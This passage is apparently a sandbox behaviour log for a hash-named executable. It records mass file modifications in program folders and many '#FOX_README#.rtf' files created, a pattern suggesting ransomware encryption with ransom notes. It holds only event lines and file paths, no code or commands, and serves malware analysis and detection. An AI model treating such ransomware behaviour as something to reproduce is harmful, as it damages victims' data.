f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File 